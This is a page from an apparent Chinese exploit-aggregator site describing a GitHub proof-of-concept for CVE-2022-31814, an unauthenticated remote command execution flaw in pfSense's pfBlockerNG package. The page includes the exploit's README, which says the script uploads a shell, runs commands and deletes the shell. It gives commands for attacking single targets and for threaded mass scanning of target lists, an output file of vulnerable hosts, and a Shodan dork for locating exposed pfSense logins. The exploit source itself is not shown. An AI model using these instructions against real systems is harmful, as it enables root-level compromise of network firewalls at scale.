POC详情: bb5d0296e7d0700e828e84cc3775fe1277039b13

来源
https://github.com/dkstar11q/CVE-2022-31814
关联漏洞
标题: pfSense 操作系统命令注入漏洞 (CVE-2022-31814)
描述:pfSense是一套基于FreeBSD Linux的网络防火墙。 pfSense pfBlockerNG 2.1.4_26 版本之前存在安全漏洞。远程攻击者通过 HTTP 主机标头中的 shell 元字符以 root 身份可以执行任意操作系统命令。
描述
pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)
介绍
# pfBlockerNG <= 2.1.4_26 Unauth RCE

This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, uploads a shell, executes a command, and then deletes the shell.

## Requirements

This script requires Python 3.x and the requests and concurrent.futures modules to be installed. You can install these modules by running:

```bash
pip3 install requests concurrent.futures
```
or
```bash
pip3 install -r requirements.txt
```
## Usage

```bash
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]

pfBlockerNG <= 2.1.4_26 Unauth RCE

options:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Console Command ('id')
  -l LIST, --list LIST  List of targets (list.txt)
  -i IP, --ip IP        Base target uri (ex. http://target-uri/)
  -t THREADS, --threads THREADS
                        Number of threads for mass scan
  -o OUTPUT, --output OUTPUT
                        Output file (vuln.txt)

```

## Single Target

To exploit a single target, use the `-i` or `--ip` flag and specify the base URL or IP Address:

```bash
python3 exploit.py -i http://target-uri/ -c 'id'
```

## Multiple Targets

To scan a list of targets, use the `-l` or `--list` flag and specify the path to the list:

```bash
python3 exploit.py -l list.txt -c 'id' -t 50
```

The `-t` or `--threads` flag can be used to specify the number of threads to use for the scan.

## Output

If the `-o` or `--output` flag is specified, the list of vulnerable targets will be written to a file:

```
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
```

## Shodan Dork:

```bash
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
```
## ⚠️  Disclaimer

> This script is for educational purposes only. Use at your own risk.
文件快照

 [4.0K]  /data/pocs/bb5d0296e7d0700e828e84cc3775fe1277039b13
├── [4.9K]  exploit.py
├── [1.8K]  README.md
└── [  53]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。